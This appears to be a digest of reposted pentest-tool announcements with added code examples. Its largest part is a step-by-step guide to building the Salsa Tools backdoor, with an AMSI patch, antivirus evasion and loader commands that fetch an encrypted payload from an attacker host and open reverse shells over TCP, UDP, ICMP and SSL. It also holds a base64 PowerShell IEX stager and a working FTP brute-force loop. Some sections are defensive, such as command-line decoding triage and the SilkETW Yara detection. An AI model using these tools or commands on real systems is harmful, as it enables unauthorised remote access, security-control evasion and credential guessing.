Salsa Tools – ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP and AV bypass, AMSI patched

Salsa Tools is a collection of three tools that, combined, give you a reverse shell on steroids in any Windows environment without needing powershell.exe for its execution. To avoid the latest detection techniques (AMSI), most of the components were written in C#. Salsa Tools was publicly released by Luis Vacas during his talk "Inmersión en la explotación tiene rima", which took place at h-c0n on 9th February 2019.

Features
- TCP/UDP/ICMP/DNS/BIND/SSL
- AV safe (17th February)
- AMSI patchers
- PowerShell execution
- …

Overview
Salsa Tools is made from three ingredients: EvilSalsa, EncrypterAssembly and SalseoLoader. Their behaviour is as follows.

Setup
Requirements: Visual Studio 2017 (or similar), Python 2.7.

Running la Salsa

Cooking EvilSalsa
EvilSalsa is the key ingredient of this recipe: it is the payload. As soon as it starts, it loads System.Management.Automation.dll and creates a runspace, so PowerShell code runs inside the loader's own process rather than in powershell.exe. Within that runspace several types of shell are available (TCP / UDP / ICMP / DNS / BINDTCP). Once EvilSalsa is loaded, the first thing it does is check whether c:\windows\system32\amsi.dll exists. If it does, it is patched using a home-cooked variant of the CyberArk and Rastamouse AMSI bypasses.

Mixing EncrypterAssembly and EvilSalsa
EncrypterAssembly encrypts the previously generated EvilSalsa with RC4. It ships both as a Python script and as an .exe.
Python usage: python encrypterassembly.py <FILE> <PASSWORD> <OUTPUT>
Executable usage: EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT>

Bringing the encrypted EvilSalsa to the table with SalseoLoader
SalseoLoader is in charge of loading the encrypted payload. It can be compiled either as an executable or as a library. As an executable, the chosen arguments are passed on the command line. As a library, a function named "main" must be exported and the arguments are passed through environment variables.

Usage (By: CyberVaca@HackPlayers):
SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode
Shells available: ReverseTCP, ReverseDNS, ReverseSSL, Shellcode, ReverseUDP, ReverseICMP, BindTCP

Tutorial

Compiling the binaries
Download the source code from GitHub and compile EvilSalsa and SalseoLoader; you need Visual Studio installed to compile the code. Build both projects for the architecture of the Windows box where you are going to use them (if the box is x64, build them for x64). The architecture is selected in Visual Studio in the "Build" tab under "Platform target" (if you can't find this option, open the Project tab and then Properties). Then build both projects (Build -> Build Solution); the build log shows the path of each resulting binary.

Prepare the backdoor
First of all, encode EvilSalsa.dll. You can use the Python script encrypterassembly.py or the compiled EncrypterAssembly project:
Python:
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txt
Windows:
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txt
Now you have everything you need to execute the whole Salseo thing: the encoded EvilSalsa.dll and the SalseoLoader binary. Upload SalseoLoader.exe to the machine. It shouldn't be detected by any AV (as of the release date; re-check against the target's AV before relying on it).

Execute the backdoor

Getting a TCP reverse shell (encoded DLL downloaded over HTTP)
Remember to start a nc listener for the reverse shell and an HTTP server to serve the encoded EvilSalsa:
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

Getting a UDP reverse shell (encoded DLL downloaded over SMB)
Remember to start a nc listener (nc -u for UDP) and an SMB server to serve the encoded EvilSalsa (impacket-smbserver):
SalseoLoader.exe password \\<Attacker-IP>\folder\evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

Getting a TCP reverse shell over SSL (using a local file)
Set up the listener on the attacker machine:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -key key.pem -cert cert.pem -port <port> -tls1
Execute the backdoor:
SalseoLoader.exe password C:\path\to\evilsalsa.dll.txt ReverseSSL <Attacker-IP> <Port>

Getting an ICMP reverse shell (encoded DLL already on the victim)
This time you need a special tool on the attacker side to receive the reverse shell. Download it from https://github.com/inquisb/icmpsh
Disable the kernel's ICMP echo replies so that icmpsh answers the echo requests instead:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
When you finish, you can enable them again with:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
Run the icmpsh master on the attacker machine:
python icmpsh_m.py "<Attacker-IP>" "<Victim-IP>"
On the victim, execute the Salseo thing:
SalseoLoader.exe password C:\Path\to\evilsalsa.dll.txt reverseicmp <Attacker-IP>

Compiling SalseoLoader as a DLL exporting the main function
Open the SalseoLoader project in Visual Studio and add this line immediately before the main function: [DllExport]

Install DllExport for this project: Tools -> NuGet Package Manager -> Manage NuGet Packages for Solution… Search for the DllExport package (Browse tab) and press Install (accept the popup). The files DllExport.bat and DllExport_Configure.bat now appear in your project folder.

Uninstall DllExport: press Uninstall (yes, it's weird, but trust me, it is necessary).

Exit Visual Studio, go to your SalseoLoader folder and execute DllExport_Configure.bat. Select x64 (if you are going to use it on an x64 box, which was my case), select System.Runtime.InteropServices (inside "Namespace for DllExport") and press Apply.

Open the project again in Visual Studio; [DllExport] should no longer be marked as an error.

Build the solution: set Output type = Class Library (Project -> SalseoLoader Properties -> Application -> Output type = Class Library) and Platform target = x64 (Project -> SalseoLoader Properties -> Build -> Platform target = x64), then Build -> Build Solution. The Output console shows the path of the new DLL.

Test the generated DLL
Copy the DLL to wherever you want to test it and execute:
rundll32.exe SalseoLoader.dll,main
If no error appears, you probably have a functional DLL.

Get a shell using the DLL
Don't forget to run an HTTP server and set up a nc listener. In library mode the loader reads its arguments from environment variables:
PowerShell:
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
From cmd.exe, set the same variables with set (for example: set pass=password) before calling rundll32.exe.

Documented by https://github.com/carlospolop-forks/

Download Salsa-tools
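The RC4 step that EncrypterAssembly performs and SalseoLoader reverses, written out as an added illustration for this digest (it is not code from the Salsa Tools repository, whose exact output framing is not shown here): the cipher itself, a base64 text framing assumed so the blob can be served as a .txt, the raw password bytes assumed as the key, and the MZ/PE sanity check a loader would want before handing the bytes to Assembly.Load. The stand-in DLL is a constructed header skeleton, not a real assembly.

```python
import base64


def rc4_keystream(key: bytes):
    """RC4 key scheduling (KSA) followed by the PRGA, as a generator of bytes."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is a stream cipher: XOR with the keystream both encrypts and decrypts."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def encrypt_assembly(assembly: bytes, password: str) -> str:
    """What an EncrypterAssembly-style tool does: RC4 under the password, then
    base64 so the blob can be served as a .txt.  The base64 framing and the use
    of the raw password bytes as the key are assumptions of this example."""
    return base64.b64encode(rc4(password.encode(), assembly)).decode("ascii")


def decrypt_assembly(blob: str, password: str) -> bytes:
    """The loader side: undo the framing, then the cipher."""
    return rc4(password.encode(), base64.b64decode(blob))


def looks_like_pe(data: bytes) -> bool:
    """Sanity check before handing bytes to Assembly.Load: 'MZ' at offset 0 and
    the PE signature at e_lfanew.  RC4 is unauthenticated, so a wrong password
    just yields noise; this is the only hint the loader gets."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


# Constructed stand-in for EvilSalsa.dll: only the MZ stub and the PE
# signature, not a real assembly.
_fake = bytearray(0x100)
_fake[:2] = b"MZ"
_fake[0x3C:0x40] = (0x80).to_bytes(4, "little")
_fake[0x80:0x84] = b"PE\0\0"
FAKE_DLL = bytes(_fake)


def round_trip(password: str = "password") -> bool:
    """Encrypt, 'serve', decrypt with the same password, and check the PE test passes."""
    served = encrypt_assembly(FAKE_DLL, password)
    recovered = decrypt_assembly(served, password)
    return recovered == FAKE_DLL and looks_like_pe(recovered)


if __name__ == "__main__":
    print("round trip ok:", round_trip())
    wrong = decrypt_assembly(encrypt_assembly(FAKE_DLL, "a"), "b")
    print("wrong password passes PE check:", looks_like_pe(wrong))
```

Note what this scheme does and does not buy: the ciphertext defeats static signatures on the served file, but the password and the payload URL travel on the command line or in environment variables, so process-creation logging (Sysmon event 1, or 4688 with command-line auditing) captures everything needed to recover the payload.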

Link: http://feedproxy.google.com/~r/PentestTools/~3/Xgz-WkNK1wE/salsa-tools-shellreverse.html

ReverseTCPShell – PowerShell ReverseTCP Shell, Client & Server

Reverse encrypted (AES 256-bit) shell over TCP, using PowerShell SecureString.

Attacker (C2-Server Listener):
PS> .\ReverseTCP.ps1

Target (Client):
CMD> ECHO IEX([string]([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String({…UAdABCAHkAdABlAHMAKAAkAEUAbgBDAG8AZABlACkAOwAkAFMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABTAGUAbgBkAEIAeQB0AGUALAAwACwAJABTAGUAbgBkAEIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABTAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAQwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApADsARQB4AGkAdAA=}))));Exit | PowerShell -
(The base64 payload is shown truncated here.) The blob is UTF-16LE ("Unicode") text, the same encoding powershell.exe -EncodedCommand expects, so anything that logs the process command line can recover the script verbatim; only the traffic is encrypted, not the stager.

PoC (screenshots in the original post): payload execution; analysis of the encrypted traffic.

Download ReverseTCPShell
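The target-side one-liner carries its script as base64 of UTF-16LE text. As an added example for this digest (not part of ReverseTCPShell), a small triage helper that does what a defender does with such a command line: find the base64 run, decode it with the right encoding, and look for the anchors the one-liner is built from. The sample script and command line are constructed; the anchor list is this example's choice.

```python
import base64
import binascii
import re

# Anchors a triage script looks for in the decoded text.  The one-liner above
# is built from IEX + FromBase64String + Unicode.GetString.
SUSPICIOUS = (
    "IEX",
    "Invoke-Expression",
    "FromBase64String",
    "Net.Sockets.TCPClient",
    "ConvertTo-SecureString",
)

# A long run of base64 alphabet characters.  The braces and parentheses that
# surround the blob in the one-liner are not in the alphabet, so they bound it.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def encode_unicode_b64(script: str) -> str:
    """Target-side framing: UTF-16LE ('Unicode') text, base64-encoded.  This is
    the same encoding powershell.exe -EncodedCommand accepts."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_unicode_b64(blob: str) -> str:
    """Decode a blob, choosing UTF-16LE when every other byte is NUL (the
    signature of ASCII text in UTF-16LE) and UTF-8 otherwise."""
    raw = base64.b64decode(blob, validate=True)
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def triage(command_line: str) -> dict:
    """Pull every long base64 run out of a process command line (as logged by
    Sysmon event 1 or Windows 4688 with command-line auditing), decode it, and
    report which anchors appear in the decoded text."""
    blobs = []
    for match in B64_RUN.finditer(command_line):
        try:
            text = decode_unicode_b64(match.group(0))
        except (binascii.Error, ValueError):
            continue  # not valid base64 after all (bad length or padding)
        lowered = text.lower()
        hits = [s for s in SUSPICIOUS if s.lower() in lowered]
        blobs.append({"offset": match.start(), "decoded": text, "hits": hits})
    return {"blobs": blobs, "flagged": any(b["hits"] for b in blobs)}


# Constructed sample: a harmless script in the shape of the client stub,
# wrapped the way the target one-liner above wraps its payload.
SAMPLE_SCRIPT = "$Client = New-Object Net.Sockets.TCPClient('10.0.0.5',4444);IEX $Data"
SAMPLE_CMDLINE = (
    "ECHO IEX([string]([Text.Encoding]::Unicode.GetString([Convert]::"
    "FromBase64String({" + encode_unicode_b64(SAMPLE_SCRIPT) + "}))));Exit | PowerShell -"
)

if __name__ == "__main__":
    for blob in triage(SAMPLE_CMDLINE)["blobs"]:
        print(blob["hits"], "->", blob["decoded"])
```

The NUL-in-odd-positions test is what separates a UTF-16LE blob from an ordinary UTF-8 one; decoding with the wrong codec produces either mojibake or a string of interleaved NULs that no anchor matches.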

Link: http://feedproxy.google.com/~r/PentestTools/~3/pWymKYDrZz8/reversetcpshell-powershell-reversetcp.html

PeekABoo – Tool To Enable Remote Desktop On The Targeted Machine

PeekABoo can be used during internal penetration testing when a user needs to enable Remote Desktop on the targeted machine. It uses PowerShell remoting to perform this task.
The tool only works if WinRM is enabled. Since Windows Server 2012, WinRM is enabled by default on all Windows Server operating systems, but not on client operating systems.
Note: Remote Desktop is disabled by default on all Windows operating systems. The user needs the local administrator password or administrator privileges on the server to enable RDP on a targeted machine.

Screenshots (in the original post):
- Targeted machine on an internal network has RDP disabled.
- Enabling the Remote Desktop service on the targeted machine by pressing option 2.
- Remote Desktop service successfully enabled on the targeted machine.

How to install?
- git clone https://github.com/Viralmaniar/PeekABoo.git
- cd PeekABoo
- python peekaboo.py

How do I use this?
- Press 1: Sets the PowerShell execution policy to Unrestricted.
- Press 2: Enables Remote Desktop on the targeted machine and shows the status of the RDP port (3389).
- Press 3: Disables Remote Desktop on the targeted machine.
- Press 4: Exits the program.
Enabling RDP is a configuration change on the target: record it in the engagement log and use option 3 to revert it when you are done.

My Windows machine does not have Python installed, what should I do?
Download an exe from the release section of the GitHub repository along with the PowerShell files available there, or build it yourself with PyInstaller after reviewing the source code. PyInstaller is available on PyPI; install it with: pip install pyinstaller

Questions?
Twitter: https://twitter.com/maniarviral
LinkedIn: https://au.linkedin.com/in/viralmaniar

Download PeekABoo

Link: http://feedproxy.google.com/~r/PentestTools/~3/pKwJLmFuw_Y/peekaboo-tool-to-enable-remote-desktop.html

Vulmap – Online Local Vulnerability Scanners Project

Vulmap is an open source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes: they make it possible to run vulnerability assessments, and pentesters/red teamers can use them for privilege escalation.
Vulmap can be used to scan localhost for vulnerabilities, see the related exploits and download them. The scripts scan localhost to gather installed software information and ask the vulmon.com API whether there are any vulnerabilities and exploits related to the installed software. If vulnerabilities exist, vulmap gives the CVE ID, risk score, vulnerability detail link, exploit ID and exploit title. Exploits can also be downloaded with vulmap.
Note that this sends the host's software inventory to an external service, which matters on client systems and in restricted environments.

Use the links below to get detailed information about vulmap:
- Vulmap Linux – Python script for Linux systems
- Vulmap Windows – PowerShell script for Windows systems

Download Vulmap
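The local half of what the text describes, as an added example for this digest (not vulmap's code): an inventory parsed from dpkg-style output and compared against an advisory table using dpkg's version-ordering rules, where a naive string comparison gets 1.10 vs 1.9 and 1.0~rc1 vs 1.0 wrong. The inventory and the advisory table are constructed placeholders; the vulmon.com API call the real tool makes is not reproduced.

```python
from typing import List, Tuple

# Constructed inventory in the shape of
#   dpkg-query -W -f='${Package} ${Version}\n'
# (not real vulmap output).
INVENTORY = """\
openssh-server 1:7.9p1-10+deb10u2
sudo 1.8.27-1+deb10u3
bash 5.0-4
libssl1.1 1.1.1d-0+deb10u6
"""

# Constructed advisory table: (package, first fixed version, label).  A real
# scan would get this from the vulmon.com API; these are placeholders only.
ADVISORIES = [
    ("sudo", "1.8.31-1", "advisory-A"),
    ("openssh-server", "1:8.2p1-1", "advisory-B"),
    ("bash", "5.0-4", "advisory-C"),
    ("bash", "4.4-1", "advisory-D"),
]


def _order(ch: str) -> int:
    """dpkg's character ordering: '~' sorts before everything, even the end of
    the string; digits are handled numerically elsewhere; letters sort before
    non-letters; end of string is 0."""
    if ch == "~":
        return -1
    if ch.isdigit():
        return 0
    if ch.isalpha():
        return ord(ch)
    return ord(ch) + 256


def _verrevcmp(a: str, b: str) -> int:
    """Compare two version fragments the way dpkg does: alternate runs of
    non-digits (compared by _order) and digits (compared numerically)."""
    ia = ib = 0
    while ia < len(a) or ib < len(b):
        first_diff = 0
        while (ia < len(a) and not a[ia].isdigit()) or (ib < len(b) and not b[ib].isdigit()):
            ac = _order(a[ia]) if ia < len(a) else 0
            bc = _order(b[ib]) if ib < len(b) else 0
            if ac != bc:
                return ac - bc
            ia += 1
            ib += 1
        while ia < len(a) and a[ia] == "0":
            ia += 1
        while ib < len(b) and b[ib] == "0":
            ib += 1
        while ia < len(a) and a[ia].isdigit() and ib < len(b) and b[ib].isdigit():
            if not first_diff:
                first_diff = ord(a[ia]) - ord(b[ib])
            ia += 1
            ib += 1
        if ia < len(a) and a[ia].isdigit():
            return 1
        if ib < len(b) and b[ib].isdigit():
            return -1
        if first_diff:
            return first_diff
    return 0


def compare_versions(v1: str, v2: str) -> int:
    """Debian version comparison of [epoch:]upstream[-revision].  Returns <0, 0 or >0."""
    def split(v: str) -> Tuple[int, str, str]:
        epoch, sep, rest = v.partition(":")
        if not sep:
            epoch, rest = "0", v
        upstream, sep, revision = rest.rpartition("-")
        if not sep:
            upstream, revision = rest, ""
        return int(epoch), upstream, revision

    e1, u1, r1 = split(v1)
    e2, u2, r2 = split(v2)
    if e1 != e2:
        return e1 - e2
    return _verrevcmp(u1, u2) or _verrevcmp(r1, r2)


def parse_inventory(text: str) -> List[Tuple[str, str]]:
    out = []
    for line in text.splitlines():
        line = line.strip()
        if line:
            name, _, version = line.partition(" ")
            out.append((name, version))
    return out


def scan(inventory_text: str, advisories=ADVISORIES) -> List[Tuple[str, str, str, str]]:
    """Report (package, installed, first fixed, label) where installed < first fixed."""
    installed = dict(parse_inventory(inventory_text))
    findings = []
    for pkg, fixed, label in advisories:
        ver = installed.get(pkg)
        if ver is not None and compare_versions(ver, fixed) < 0:
            findings.append((pkg, ver, fixed, label))
    return findings


if __name__ == "__main__":
    for finding in scan(INVENTORY):
        print(finding)
```

Installed versions equal to the first fixed version are not reported (bash above), and a package without an advisory entry is never reported; a backported fix in the Debian revision (the +deb10uN suffix) still compares lower than a newer upstream, which is exactly the false positive a vendor-aware feed has to correct for.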

Link: http://www.kitploit.com/2019/05/vulmap-online-local-vulnerability.html

UPDATE: MITRE CALDERA 2.0

PenTestIT RSS Feed
I read a tweet about two days ago and today, MITRE CALDERA 2.0 is out already! If you remember, I wrote briefly about this automated adversary emulation system in my post titled – List of Adversary Emulation Tools. This is a major update and this post is about the changes I personally see in this…
Read more about UPDATE: MITRE CALDERA 2.0
The post UPDATE: MITRE CALDERA 2.0 appeared first on PenTestIT.

Link: http://pentestit.com/update-mitre-caldera-2-0/

FTPBruter – A FTP Server Brute Forcing Tool

Brute forcing tool for FTP servers. FTPBruter works on any OS that has and supports Python 3.

Feature
- Brute force an FTP server with a username or a list of usernames (that's all).

Install and Run on Linux
You have to install Python 3 first:
- Arch Linux and its derivatives: sudo pacman -S python3
- Debian and its derivatives: sudo apt install python3
Then:
git clone https://github.com/GitHackTools/FTPBruter
cd FTPBruter
python3 ftpbruter.py

Install and Run on Windows
Download and run the Python 3.7.x setup file from Python.org. During the install, enable "Add Python 3.7 to PATH".
Download and run the Git setup file from Git-scm.com and choose "Use Git from Windows Command Prompt".
After that, open PowerShell or Command Prompt and enter these commands:
git clone https://github.com/GitHackTools/FTPBruter
cd FTPBruter
python3 ftpbruter.py
(The python.org installer provides python and the py launcher rather than a python3 command; if python3 is not found, use python ftpbruter.py or py -3 ftpbruter.py.)
If you don't want to install Git, you can download FTPBruter-master.zip, extract it and use it.

Screenshots: see the original post.

Contact the coder
Website: GitHackTools.blogspot.com
Twitter: @SecureGF

To-do list
- Check anonymous login.
- Auto-change proxy while brute forcing.

Download FTPBruter
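The brute-force loop itself, as an added example for this digest (not FTPBruter's code): anonymous login is checked first (the first item on the to-do list), then each user is tried against the password list, and repeated connection failures, which on a real server usually mean lockout or rate limiting, abort the run instead of burning the rest of the wordlist. The fake_server function is a constructed stand-in so the loop runs offline; ftp_login_attempt builds the real attempt on the standard library's ftplib.

```python
import ftplib
import time
from enum import Enum
from typing import Callable, Iterable, List, Tuple


class Outcome(Enum):
    OK = "login accepted"
    DENIED = "login incorrect"      # 5xx reply (normally 530): the guess was simply wrong
    ERROR = "connection problem"    # timeout, reset, 421: lockout or rate limiting


def ftp_login_attempt(host: str, port: int = 21, timeout: float = 5.0) -> Callable[[str, str], Outcome]:
    """Build a real attempt function on top of ftplib (one connection per guess)."""
    def attempt(user: str, password: str) -> Outcome:
        ftp = ftplib.FTP()
        try:
            ftp.connect(host, port, timeout=timeout)
            ftp.login(user, password)
            return Outcome.OK
        except ftplib.error_perm:
            return Outcome.DENIED
        except (ftplib.error_temp, ftplib.error_reply, EOFError, OSError):
            return Outcome.ERROR
        finally:
            ftp.close()
    return attempt


def brute_force(users: Iterable[str], passwords: Iterable[str],
                attempt: Callable[[str, str], Outcome],
                delay: float = 0.0, max_errors: int = 3,
                try_anonymous: bool = True) -> dict:
    """Try anonymous first, then every user against every password, stopping
    per user at the first hit.  Consecutive connection errors are treated as
    the server pushing back: back off, and abort once max_errors is reached."""
    found: List[Tuple[str, str]] = []
    attempts = 0
    errors = 0
    if try_anonymous:
        attempts += 1
        if attempt("anonymous", "anonymous@example.com") is Outcome.OK:
            found.append(("anonymous", "anonymous@example.com"))
    passwords = list(passwords)
    for user in users:
        for password in passwords:
            attempts += 1
            result = attempt(user, password)
            if result is Outcome.OK:
                found.append((user, password))
                break
            if result is Outcome.ERROR:
                errors += 1
                if errors >= max_errors:
                    return {"found": found, "attempts": attempts, "aborted": True}
                time.sleep(delay * (2 ** errors))   # exponential back-off on errors
                continue
            errors = 0
            time.sleep(delay)
    return {"found": found, "attempts": attempts, "aborted": False}


# Constructed stand-in for a server so the loop runs offline: anonymous is
# open, one valid account exists, and one user is always dropped (lockout).
def fake_server(user: str, password: str) -> Outcome:
    if user == "anonymous":
        return Outcome.OK
    if user == "locked":
        return Outcome.ERROR
    return Outcome.OK if (user, password) == ("alice", "Summer2019") else Outcome.DENIED


if __name__ == "__main__":
    print(brute_force(["alice"], ["123456", "Summer2019", "password"], fake_server))
```

Against a live target the call is brute_force(users, passwords, ftp_login_attempt("10.0.0.5"), delay=1.0); keep the delay non-zero, since most FTP daemons count failures per source and will start dropping connections, which this loop reports as aborted rather than as "no valid credentials".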

Link: http://feedproxy.google.com/~r/PentestTools/~3/hudxodR8GrU/ftpbruter-ftp-server-brute-forcing-tool.html

SilkETW – Flexible C# Wrapper For ETW (Event Tracing for Windows)

SilkETW is a flexible C# wrapper for ETW, meant to abstract away the complexities of ETW and give people a simple interface to perform research and introspection. While SilkETW has obvious defensive (and offensive) applications, it is primarily a research tool in its current state.

For easy consumption, output data is serialized to JSON. The JSON data can either be analyzed locally using PowerShell or shipped off to third-party infrastructure such as Elasticsearch.

Implementation Details

Libraries
SilkETW is built on .NET v4.5 and uses a number of third-party libraries, listed below. Please see LICENSE-3RD-PARTY for further details.

ModuleId                                  Version   LicenseUrl
McMaster.Extensions.CommandLineUtils      2.3.2     https://licenses.nuget.org/Apache-2.0
Microsoft.Diagnostics.Tracing.TraceEvent  2.0.36    https://github.com/Microsoft/perfview/blob/master/LICENSE.TXT
Newtonsoft.Json                           12.0.1    https://licenses.nuget.org/MIT
System.ValueTuple                         4.4.0     https://github.com/dotnet/corefx/blob/master/LICENSE.TXT
YaraSharp                                 1.3.1     https://github.com/stellarbear/YaraSharp/blob/master/LICENSE

Command Line Options
Command line usage is fairly straightforward and user input is validated in the execution prologue. The original post shows the help output as an image.

JSON Output Structure
The JSON output, prior to serialization, is formatted according to the following C# struct:

public struct EventRecordStruct
{
    public Guid ProviderGuid;
    public List<string> YaraMatch;
    public string ProviderName;
    public string EventName;
    public TraceEventOpcode Opcode;
    public string OpcodeName;
    public DateTime TimeStamp;
    public int ThreadID;
    public int ProcessID;
    public string ProcessName;
    public int PointerSize;
    public int EventDataLength;
    public Hashtable XmlEventData;
}

Note that, depending on the provider and the event type, the XmlEventData hash table holds variable data. Sample JSON output for "Microsoft-Windows-Kernel-Process" -> "ThreadStop/Stop":

{
  "ProviderGuid": "22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716",
  "YaraMatch": [],
  "ProviderName": "Microsoft-Windows-Kernel-Process",
  "EventName": "ThreadStop/Stop",
  "Opcode": 2,
  "OpcodeName": "Stop",
  "TimeStamp": "2019-03-03T17:58:14.2862348+00:00",
  "ThreadID": 11996,
  "ProcessID": 8416,
  "ProcessName": "",
  "PointerSize": 8,
  "EventDataLength": 76,
  "XmlEventData": {
    "FormattedMessage": "Thread 11,996 (in Process 8,416) stopped. ",
    "StartAddr": "0x7fffe299a110",
    "ThreadID": "11,996",
    "UserStackLimit": "0x3d632000",
    "StackLimit": "0xfffff38632d39000",
    "MSec": "560.5709",
    "TebBase": "0x91c000",
    "CycleTime": "4,266,270",
    "ProcessID": "8,416",
    "PID": "8416",
    "StackBase": "0xfffff38632d40000",
    "SubProcessTag": "0",
    "TID": "11996",
    "ProviderName": "Microsoft-Windows-Kernel-Process",
    "PName": "",
    "UserStackBase": "0x3d640000",
    "EventName": "ThreadStop/Stop",
    "Win32StartAddr": "0x7fffe299a110"
  }
}

Usage

Filter data in PowerShell
You can import JSON output from SilkETW in PowerShell using the following simple function. It converts the file line by line, so it expects one JSON object per line:

function Get-SilkData {
    param($Path)
    $JSONObject = @()
    Get-Content $Path | ForEach-Object {
        $JSONObject += $_ | ConvertFrom-Json
    }
    $JSONObject
}

In the example below we collect process event data from the kernel provider and use image loads to identify Mimikatz execution. We can collect the required data with the following command:
SilkETW.exe -t kernel -kk ImageLoad -ot file -p C:\Users\b33f\Desktop\mimikatz.json
With the data in hand it is easy to sort, grep and filter for the properties we are interested in.

Yara
SilkETW includes Yara functionality to filter or tag event data. Again, this has obvious defensive capabilities, but it can just as easily be used to augment your ETW research. In this example we use the following Yara rule to detect Seatbelt execution in memory through Cobalt Strike's execute-assembly:

rule Seatbelt_GetTokenInformation
{
    strings:
        $s1 = "ManagedInteropMethodName=GetTokenInformation" ascii wide nocase
        $s2 = "TOKEN_INFORMATION_CLASS" ascii wide nocase
        $s3 = /bool\(native int,valuetype \w+\.\w+\/\w+,native int,int32,int32&/
        $s4 = "locals (int32,int64,int64,int64,int64,int32& pinned,bool,int32)" ascii wide nocase
    condition:
        all of ($s*)
}

We can start collecting .NET ETW data with the following command. The "-yo" option indicates that only Yara matches should be written to disk:
SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038 -l verbose -y C:\Users\b33f\Desktop\yara -yo matches -ot file -p C:\Users\b33f\Desktop\yara.json
At runtime we can see that our Yara rule was hit. Note also that we are only capturing a subset of the "Microsoft-Windows-DotNETRuntime" events (keyword mask 0x2038), specifically JitKeyword, InteropKeyword, LoaderKeyword and NGenKeyword.

Changelog
For details on version-specific changes, please refer to the Changelog.

Download SilkETW
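The filtering step described above, done outside PowerShell as an added example for this digest (not SilkETW's own code). The Kernel-Process record mirrors the sample above; the Image/Load records, their provider fields (placeholder GUID, "Windows Kernel" name) and the FileName/ImageBase keys are an assumed shape for what "-t kernel -kk ImageLoad" produces, constructed here so the code runs offline.

```python
import json
from collections import defaultdict
from typing import Dict, List

# Constructed SilkETW-style output: one JSON object per line, using the field
# names of EventRecordStruct above.  The Image/Load records are an assumed
# shape, not captured data.  Kernel image-load events carry NT device paths
# (\Device\HarddiskVolumeN\...), not drive letters.
SAMPLE_LOG = r"""
{"ProviderGuid":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","YaraMatch":[],"ProviderName":"Microsoft-Windows-Kernel-Process","EventName":"ThreadStop/Stop","Opcode":2,"OpcodeName":"Stop","TimeStamp":"2019-03-03T17:58:14.2862348+00:00","ThreadID":11996,"ProcessID":8416,"ProcessName":"","PointerSize":8,"EventDataLength":76,"XmlEventData":{"ThreadID":"11,996","ProcessID":"8,416"}}
{"ProviderGuid":"00000000-0000-0000-0000-000000000000","YaraMatch":[],"ProviderName":"Windows Kernel","EventName":"Image/Load","Opcode":10,"OpcodeName":"Load","TimeStamp":"2019-03-03T17:58:20.0000000+00:00","ThreadID":4321,"ProcessID":5120,"ProcessName":"powershell","PointerSize":8,"EventDataLength":120,"XmlEventData":{"FileName":"\\Device\\HarddiskVolume2\\Windows\\System32\\kernel32.dll","ImageBase":"0x7ff8a2c10000"}}
{"ProviderGuid":"00000000-0000-0000-0000-000000000000","YaraMatch":[],"ProviderName":"Windows Kernel","EventName":"Image/Load","Opcode":10,"OpcodeName":"Load","TimeStamp":"2019-03-03T17:58:21.0000000+00:00","ThreadID":4321,"ProcessID":5120,"ProcessName":"powershell","PointerSize":8,"EventDataLength":120,"XmlEventData":{"FileName":"\\Device\\HarddiskVolume2\\Users\\b33f\\Desktop\\mimikatz.exe","ImageBase":"0x7ff6c0000000"}}
"""


def load_events(text: str) -> List[dict]:
    """Parse line-delimited JSON, skipping blank lines (the Get-SilkData
    function above does the same with ConvertFrom-Json on each line)."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def image_loads(events: List[dict]) -> List[dict]:
    return [e for e in events if e.get("EventName") == "Image/Load"]


def loads_by_process(events: List[dict]) -> Dict[int, List[str]]:
    """Map each PID to the images it loaded, lower-cased for matching."""
    out: Dict[int, List[str]] = defaultdict(list)
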